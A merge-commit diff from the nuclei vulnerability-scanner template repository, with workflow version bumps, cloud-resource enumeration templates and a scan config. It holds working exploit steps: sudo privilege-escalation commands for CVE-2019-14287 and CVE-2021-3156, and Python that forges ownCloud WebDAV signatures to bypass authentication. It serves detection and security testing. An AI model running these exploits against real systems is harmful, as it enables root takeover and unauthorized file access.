Merge branch 'main' into main

patch-1
Dhiyaneshwaran 2024-01-04 12:01:25 +05:30 committed by GitHub
commit d4da7bab7f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2278 changed files with 16373 additions and 9004 deletions

View File

@ -17,7 +17,7 @@ jobs:
- name: checkout repo content - name: checkout repo content
uses: actions/checkout@v4 # checkout the repository content uses: actions/checkout@v4 # checkout the repository content
- name: setup python - name: setup python
uses: actions/setup-python@v4 uses: actions/setup-python@v5
with: with:
python-version: '3.10' # install the python version needed python-version: '3.10' # install the python version needed
- name: install python packages - name: install python packages

View File

@ -15,7 +15,7 @@ jobs:
steps: steps:
- uses: actions/checkout@master - uses: actions/checkout@master
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.19 go-version: 1.19

View File

@ -22,7 +22,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Python - name: Set up Python
uses: actions/setup-python@v4 uses: actions/setup-python@v5
with: with:
python-version: "3.8" python-version: "3.8"

View File

@ -18,7 +18,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x

View File

@ -12,7 +12,7 @@ jobs:
if: github.repository == 'projectdiscovery/nuclei-templates' if: github.repository == 'projectdiscovery/nuclei-templates'
steps: steps:
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x

View File

@ -17,7 +17,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x

View File

@ -15,7 +15,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x
@ -25,5 +25,5 @@ jobs:
- name: Template Validation - name: Template Validation
run: | run: |
cp -r ${{ github.workspace }} $HOME cp -r ${{ github.workspace }} $HOME
nuclei -duc -validate -allow-local-file-access nuclei -duc -validate -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config
nuclei -duc -validate -w ./workflows -allow-local-file-access nuclei -duc -validate -w ./workflows -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config

View File

@ -13,7 +13,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x

View File

@ -15,7 +15,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.19 go-version: 1.19

32
.github/workflows/templates-sync.yml vendored Normal file
View File

@ -0,0 +1,32 @@
name: Sync Repositories Workflow
on:
push:
paths:
- '.new-additions'
- 'http/cves/2015/CVE-2015-2794.yaml'
- 'http/cves/2023/CVE-2023-42343.yaml'
- 'http/cves/2023/CVE-2023-46574.yaml'
- 'http/exposures/docker-daemon-exposed.yaml'
- 'http/token-spray/api-openai.yaml'
- 'http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml'
- 'http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml'
- 'http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml'
- 'cloud/enum/aws-app-enum.yaml'
- 'cloud/enum/aws-s3-bucket-enum.yaml'
- 'cloud/enum/azure-db-enum.yaml'
- 'cloud/enum/azure-vm-cloud-enum.yaml'
- 'cloud/enum/azure-website-enum.yaml'
- 'cloud/enum/gcp-app-engine-enum.yaml'
- 'cloud/enum/gcp-bucket-enum.yaml'
- 'cloud/enum/gcp-firebase-app-enum.yaml'
- 'cloud/enum/gcp-firebase-rtdb-enum.yaml'
- 'http/cves/2023/CVE-2023-41109.yaml'
- 'network/misconfig/erlang-daemon.yaml'
workflow_dispatch:
jobs:
triggerRemoteWorkflow:
runs-on: ubuntu-latest
steps:
- name: Trigger Remote Workflow with curl
run: |
curl -i -s -k -X 'POST' -H 'Host: api.github.com' -H "Authorization: token ${{ secrets.GTOKEN }}" --data-binary $'{\"ref\":\"main\"}' 'https://api.github.com/repos/projectdiscovery/early-templates/actions/workflows/reposync.yml/dispatches'

View File

@ -14,7 +14,7 @@ jobs:
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
- name: Install Python3 - name: Install Python3
uses: actions/setup-python@v4 uses: actions/setup-python@v5
with: with:
python-version: "3.10" python-version: "3.10"
- run: | - run: |

View File

@ -1,33 +1,27 @@
headless/cves/2018/CVE-2018-25031.yaml cloud/enum/aws-app-enum.yaml
http/cves/2023/CVE-2023-22232.yaml cloud/enum/aws-s3-bucket-enum.yaml
http/cves/2023/CVE-2023-3368.yaml cloud/enum/azure-db-enum.yaml
http/cves/2023/CVE-2023-36144.yaml cloud/enum/azure-vm-cloud-enum.yaml
http/cves/2023/CVE-2023-39002.yaml cloud/enum/azure-website-enum.yaml
http/cves/2023/CVE-2023-43177.yaml cloud/enum/gcp-app-engine-enum.yaml
http/cves/2023/CVE-2023-49070.yaml cloud/enum/gcp-bucket-enum.yaml
http/cves/2023/CVE-2023-5556.yaml cloud/enum/gcp-firebase-app-enum.yaml
http/cves/2023/CVE-2023-6018.yaml cloud/enum/gcp-firebase-rtdb-enum.yaml
http/cves/2023/CVE-2023-6020.yaml code/cves/2019/CVE-2019-14287.yaml
http/cves/2023/CVE-2023-6021.yaml code/cves/2021/CVE-2021-3156.yaml
http/cves/2023/CVE-2023-6380.yaml http/cves/2015/CVE-2015-2794.yaml
http/default-logins/dataease/dataease-default-login.yaml http/cves/2020/CVE-2020-12124.yaml
http/default-logins/splunk/splunk-default-login.yaml http/cves/2023/CVE-2023-41109.yaml
http/exposed-panels/dataease-panel.yaml http/cves/2023/CVE-2023-42343.yaml
http/exposed-panels/reportico-admin-panel.yaml http/cves/2023/CVE-2023-46574.yaml
http/exposed-panels/tailon-panel.yaml http/cves/2023/CVE-2023-50968.yaml
http/exposures/configs/dompdf-config.yaml http/cves/2023/CVE-2023-51467.yaml
http/misconfiguration/installer/businesso-installer.yaml http/exposures/docker-daemon-exposed.yaml
http/misconfiguration/installer/chamilo-installer.yaml http/misconfiguration/cookies-without-httponly.yaml
http/misconfiguration/installer/knowledgetree-installer.yaml http/misconfiguration/php/php-composer-binary.yaml
http/misconfiguration/installer/phpgedview-installer.yaml http/token-spray/api-openai.yaml
http/misconfiguration/installer/wowcms-installer.yaml http/vulnerabilities/dahua/dahua-icc-backdoor-user.yaml
http/misconfiguration/secnet-info-leak.yaml http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
http/technologies/element-web-detect.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml
http/technologies/matrix-homeserver-detect.yaml http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
http/vulnerabilities/dahua/dahua-wpms-lfi.yaml network/misconfig/erlang-daemon.yaml
http/vulnerabilities/dahua/dahua-wpms-rce.yaml
http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml
http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml
http/vulnerabilities/other/yibao-sqli.yaml
http/vulnerabilities/other/yunanbao-rce.yaml
javascript/cves/2023/CVE-2023-46604.yaml

View File

@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics ## Nuclei Templates Top 10 statistics
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|-------------------|-------|----------|-------|------|-------| |-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2271 | dhiyaneshdk | 1109 | http | 6856 | info | 3326 | file | 312 | | cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
| panel | 1034 | dwisiswant0 | 800 | file | 312 | high | 1439 | dns | 18 | | panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
| wordpress | 929 | daffainfo | 787 | workflows | 191 | medium | 1429 | | | | wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
| xss | 845 | pikpikcu | 353 | network | 133 | critical | 906 | | | | xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
| exposure | 833 | pussycat0x | 307 | ssl | 27 | low | 245 | | | | exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
| wp-plugin | 811 | ritikchaddha | 293 | javascript | 20 | unknown | 32 | | | | wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
| osint | 675 | pdteam | 283 | dns | 17 | | | | | | osint | 677 | pdteam | 286 | dns | 17 | | | | |
| tech | 645 | ricardomaia | 229 | headless | 10 | | | | | | tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
| lfi | 614 | geeknik | 221 | code | 2 | | | | | | lfi | 619 | geeknik | 224 | code | 3 | | | | |
| edb | 598 | theamanrawat | 221 | contributors.json | 1 | | | | | | edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |
**525 directories, 7843 files**. **534 directories, 7902 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|-------------------|-------|----------|-------|------|-------| |-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2271 | dhiyaneshdk | 1109 | http | 6856 | info | 3326 | file | 312 | | cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
| panel | 1034 | dwisiswant0 | 800 | file | 312 | high | 1439 | dns | 18 | | panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
| wordpress | 929 | daffainfo | 787 | workflows | 191 | medium | 1429 | | | | wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
| xss | 845 | pikpikcu | 353 | network | 133 | critical | 906 | | | | xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
| exposure | 833 | pussycat0x | 307 | ssl | 27 | low | 245 | | | | exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
| wp-plugin | 811 | ritikchaddha | 293 | javascript | 20 | unknown | 32 | | | | wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
| osint | 675 | pdteam | 283 | dns | 17 | | | | | | osint | 677 | pdteam | 286 | dns | 17 | | | | |
| tech | 645 | ricardomaia | 229 | headless | 10 | | | | | | tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
| lfi | 614 | geeknik | 221 | code | 2 | | | | | | lfi | 619 | geeknik | 224 | code | 3 | | | | |
| edb | 598 | theamanrawat | 221 | contributors.json | 1 | | | | | | edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |

View File

@ -0,0 +1,37 @@
id: aws-app-enum
info:
name: AWS Apps - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for AWS apps (WorkDocs, WorkMail, Connect, etc.)
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,aws
self-contained: true
variables:
BaseDNS: "awsapps.com"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: status
name: "Registered AWS App"
status:
- 200
- 302
condition: or
# digest: 490a0046304402206cc21deaf3d479badf5b8b46dbe3448bd60ec76fc64503726d554051cca8a9bc02204dba37b6781d1c66eca341ac1c6c7a5041cfb376832d862700a864cc91af8870:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,41 @@
id: aws-s3-bucket-enum
info:
name: AWS S3 Buckets - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for open and protected buckets in AWS S3
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,aws
self-contained: true
variables:
BaseDNS: "s3.amazonaws.com"
http:
- raw:
- |
GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers-condition: or
matchers:
- type: status
name: "Open AWS S3 Bucket"
status:
- 200
- type: status
name: "Protected AWS S3 Bucket"
status:
- 403
# digest: 4b0a00483046022100c0cbb1d95cb9a7d7b9bd7a4bf578af739426ab59afa3faa001104c29c4ff999e022100cdfc9930e3c0ae01086792f1391ff33c22070722d3bd874d1e3f87f31c938a17:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,32 @@
id: azure-db-enum
info:
name: Azure Databases - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Azure databases via their registered DNS names
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,azure
self-contained: true
variables:
BaseDNS: "database.windows.net"
dns:
- name: "{{wordlist}}.{{BaseDNS}}"
type: A
class: inet
recursion: true
attack: batteringram
matchers:
- type: word
part: answer
words:
- "IN\tA"
# digest: 4a0a004730450221008d5f64c419db15f1c1bce4a802f395bdcc44847f878890831869236c37a1678002205d7502015cece8506d34b9c319643441e334856c7fd34e1baa70a6a6942f134e:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,65 @@
id: azure-vm-cloud-enum
info:
name: Azure Virtual Machines - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Azure virtual machines via their registered DNS names.
metadata:
verified: true
tags: cloud,cloud-enum,azure
self-contained: true
variables:
BaseDNS: "cloudapp.azure.com"
regionname:
- eastasia
- southeastasia
- centralus
- eastus
- eastus2
- westus
- northcentralus
- southcentralus
- northeurope
- westeurope
- japanwest
- japaneast
- brazilsouth
- australiaeast
- australiasoutheast
- southindia
- centralindia
- westindia
- canadacentral
- canadaeast
- uksouth
- ukwest
- westcentralus
- westus2
- koreacentral
- koreasouth
- francecentral
- francesouth
- australiacentral
- australiacentral2
- southafricanorth
- southafricawest
dns:
- name: "{{wordlist}}.{{regionname}}.{{BaseDNS}}"
type: A
class: inet
recursion: true
attack: batteringram
matchers:
- type: word
part: answer
words:
- "IN\tA"
# digest: 4b0a004830460221008d223bfdb3585e335e8282ca206945a6f7704dab4a2899d3410229bf0db7132d022100b9de9af2b393a559575b67a5b25b6334fe8cddd1ceed5059ee634dc3b0292d50:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,36 @@
id: azure-website-enum
info:
name: Azure Websites - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Azure websites that are registered and responding.
metadata:
verified: true
tags: cloud,azure
self-contained: true
variables:
BaseDNS: "azurewebsites.net"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: status
name: "Available Azure Website"
status:
- 200
- 302
condition: or
# digest: 490a00463044022001ff1a4cff9e33f3817df1e824a00e35f76c6f8e22cd34e3616e452978dc46f702200913c7710eba2b3df98325a1bb7da86b55cde6d4a3d7199a7d952f1f7988a3fa:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,42 @@
id: gcp-app-engine-enum
info:
name: GCP App Engine (Appspot) - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for App Engine Apps in GCP.
metadata:
verified: true
tags: cloud,cloud-enum,gcp
self-contained: true
variables:
BaseDNS: "appspot.com"
loginRedirect: "accounts.google.com"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: dsl
name: "Open GCP App Engine App"
dsl:
- "status_code==200"
- type: dsl
name: "Protected GCP App Engine App"
dsl:
- "status_code==302"
- contains(location, "login")
condition: and
# digest: 490a0046304402204edc5a3fc90ff80b8397219e37a716d5b582c9821dbb0edda2c52c585aa241ca022067b0c7178f7f345975f765bdd56afc967505028e459ed113c8fbd450a1dcb76a:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,39 @@
id: gcp-bucket-enum
info:
name: GCP Buckets - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for open and protected buckets in GCP.
metadata:
verified: true
tags: cloud,cloud-enum,gcp
self-contained: true
variables:
BaseDNS: "storage.googleapis.com"
http:
- raw:
- |
GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: status
name: "Open GCP Bucket"
status:
- 200
- type: status
name: "Protected GCP Bucket"
status:
- 403
# digest: 490a004630440220549241cfe0dbdadf24bcbdabd6cbf8e82a45bea577710e8409da53f3bdef37d202203bab8b09dea7b68aafc32f8214b331ee6dc4dbe85c0e7a34693b8062dec6fb6a:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,34 @@
id: gcp-firebase-app-enum
info:
name: GCP Firebase Apps - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Firebase Apps in GCP.
metadata:
verified: true
tags: cloud,cloud-enum,gcp
self-contained: true
variables:
BaseDNS: "firebaseapp.com"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: status
name: "Open GCP Firebase App"
status:
- 200
# digest: 490a004630440220721a516d58d71b3c20990c97c22986fd212caafa366f2641bdb4fe9df0a53f9802205ecd4bfcda0808d5002e9d1194e0ec0f4d2b2f2140170c0df4ffb11372a6470f:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,50 @@
id: gcp-firebase-rtdb-enum
info:
name: GCP Firebase Realtime Database - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Firebase Realtime Databases in GCP.
metadata:
verified: true
tags: cloud,cloud-enum,gcp
self-contained: true
variables:
BaseDNS: "firebaseio.com"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}}/.json HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers-condition: or
matchers:
- type: status
name: "Open GCP Firebase RTDB"
status:
- 200
- type: status
name: "Protected GCP Firebase RTDB"
status:
- 401
- type: status
name: "Payment GCP on Google Firebase RTDB"
status:
- 402
- type: status
name: "Deactivated GCP Firebase RTDB"
status:
- 423
# digest: 490a0046304402200dcb47ae02c77c619eea0d95a6ab7dc9f2be071cea09abee3a7ab748b11e561c022034956ced05346f9cfcc9d425d92fa1242c979572e8ae02030496597f64ccfe82:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,39 @@
id: CVE-2019-14287
info:
name: Sudo <= 1.8.27 - Security Bypass
author: daffainfo
severity: high
description: |
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
tags: cve,cve2019,sudo,code,linux,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
sudo -u#-1 whoami
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition: and
# digest: 4b0a004830460221009a6464ce800ea5ccd047c283f312c0742d1000b41b1fc9ab9405dbb1e732f546022100e8c25b8a624190544f16221aab038c76af13d15cf331598437e9fe53a3353c25:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,31 @@
id: CVE-2021-3156
info:
name: Sudo Baron Samedit - Local Privilege Escalation
author: pussycat0x
severity: high
description: |
Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.
reference:
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
metadata:
verified: true
tags: cve,cve2021,sudo,code,linux,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
matchers:
- type: word
words:
- "malloc(): memory corruption"
- "Aborted (core dumped)"
condition: and
# digest: 490a004630440220403cc295d817a1432233bcdffd5874db501002624cbd50c1002bfc06e3ae86bb022007b2f6d4f86e3fab7f53cb5c73eacd4ab22b91801f6ba5109885d3b9a294220a:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,89 @@
id: CVE-2023-49105
info:
name: OwnCloud - WebDAV API Authentication Bypass
author: ChristianPoeschl,FlorianDewald,usdAG
severity: critical
description: |
An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
reference:
- https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/
- https://github.com/0xfed/ownedcloud
- https://owncloud.org/security
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-49105
cwe-id: CWE-287
epss-score: 0.00091
epss-percentile: 0.38353
cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: owncloud
product: owncloud
shodan-query: title:"owncloud"
tags: cve,cve2023,owncloud,code,auth-bypass
variables:
username: admin
code:
- engine:
- py
- python3 # requires python to be pre-installed on system running nuclei
source: |
# build signature for presigned urls
import base64, hashlib, datetime, os
from urllib.parse import urlencode
username = os.getenv('username')
base_url = os.getenv('BaseURL')
dav_url = f'{base_url}/remote.php/dav/files/{username}'
oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
data = {
'OC-Expires': '991200',
'OC-Verb': 'PROPFIND',
'OC-Credential': username,
'OC-Date': oc_date
}
sig_url = f'{dav_url}?{urlencode(data)}'
# derive signature from empty sign key
dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)
final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'
#final_url = f'{sig_url}&OC-Signature={dk.hex()}'
print(final_url)
http:
- raw:
- |
PROPFIND {{code_response}} HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Authorization: Basic {{base64('{{username}}')}}
matchers-condition: or
matchers:
- type: dsl
name: bypass-correct-user
dsl:
- status_code == 207
- contains(body, 'owncloud.org')
condition: and
- type: word
name: bypass-wrong-user
part: body
words:
- User unknown
- Sabre
- Exception
- NotAuthenticated
condition: and
extractors:
- type: dsl
dsl:
- '"Username => "+ username'
# digest: 4a0a00473045022100f17bb3bb403b74c4e84e6190df79bf767df834017742b4b95607de42a3d948bb02205f2f1de3f09d31920d6bf102ba93c1ad271809327b5997d8d58e9f97f2886c11:922c64590222798bb761d5b6d8e72950

88
config/recommended.yml Normal file
View File

@ -0,0 +1,88 @@
# This is a configuration file for the recommended template profile.
# Additional configuration profiles can be created for different types of nuclei scans.
# They should be placed under the 'config' directory at:
# https://github.com/projectdiscovery/nuclei-templates
# Here is an example of how to use a config profile:
# nuclei -config config/recommended.yml -list target_list_to_scan.txt
exclude-severity:
- info
exclude-tags:
- tech
- dos
- fuzz
- creds-stuffing
- token-spray
exclude-protocols:
- ssl
- dns
- file
- code
- whois
- headless
- workflow
exclude-id:
- CVE-2021-45967
- CVE-2021-36380
- CVE-2021-33544
- CVE-2021-32305
- CVE-2021-31755
- CVE-2021-28164
- CVE-2021-27931
- CVE-2021-26855
- CVE-2021-25052
- CVE-2021-1498
- CVE-2020-7796
- CVE-2020-5775
- CVE-2020-35713
- CVE-2020-26919
- CVE-2020-25223
- CVE-2020-24148
- CVE-2020-10770
- CVE-2019-9978
- CVE-2019-8451
- CVE-2019-3929
- CVE-2019-2767
- CVE-2019-2616
- CVE-2019-20224
- CVE-2019-19824
- CVE-2019-10758
- CVE-2018-16167
- CVE-2018-15517
- CVE-2018-1000600
- CVE-2017-9506
- CVE-2017-3506
- CVE-2017-18638
- CVE-2016-1555
- CVE-2015-8813
- CVE-2014-3206
- CVE-2009-4223
- CNVD-2021-09650
- generic-tokens
- credentials-disclosure
- targa-camera-ssrf
- cloudflare-external-image-resize
- linkerd-ssrf-detection
- ssrf-via-oauth-misconfig
- tls-sni-proxy
- xmlrpc-pingback-ssrf
- hashicorp-consul-rce
- mirai-unknown-rce
- optilink-ont1gew-gpon-rce
- sar2html-rce
- zimbra-preauth-ssrf
- wp-under-construction-ssrf
- wp-xmlrpc-pingback-detection
- fastjson-1-2-41-rce
- fastjson-1-2-42-rce
- fastjson-1-2-43-rce
- fastjson-1-2-62-rce
- fastjson-1-2-67-rce
- fastjson-1-2-68-rce
- request-based-interaction
- open-proxy-internal
- open-proxy-localhost
- open-proxy-portscan

View File

@ -223,7 +223,7 @@
{"ID":"CVE-2014-3206","Info":{"Name":"Seagate BlackArmor NAS - Command Injection","Severity":"critical","Description":"Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-3206.yaml"} {"ID":"CVE-2014-3206","Info":{"Name":"Seagate BlackArmor NAS - Command Injection","Severity":"critical","Description":"Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-3206.yaml"}
{"ID":"CVE-2014-3704","Info":{"Name":"Drupal SQL Injection","Severity":"high","Description":"The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3704.yaml"} {"ID":"CVE-2014-3704","Info":{"Name":"Drupal SQL Injection","Severity":"high","Description":"The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3704.yaml"}
{"ID":"CVE-2014-3744","Info":{"Name":"Node.js st module Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3744.yaml"} {"ID":"CVE-2014-3744","Info":{"Name":"Node.js st module Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3744.yaml"}
{"ID":"CVE-2014-4210","Info":{"Name":"Oracle Weblogic - Server-Side Request Forgery","Severity":"medium","Description":"An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4210.yaml"} {"ID":"CVE-2014-4210","Info":{"Name":"Oracle Weblogic - Server-Side Request Forgery","Severity":"medium","Description":"An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4210.yaml"}
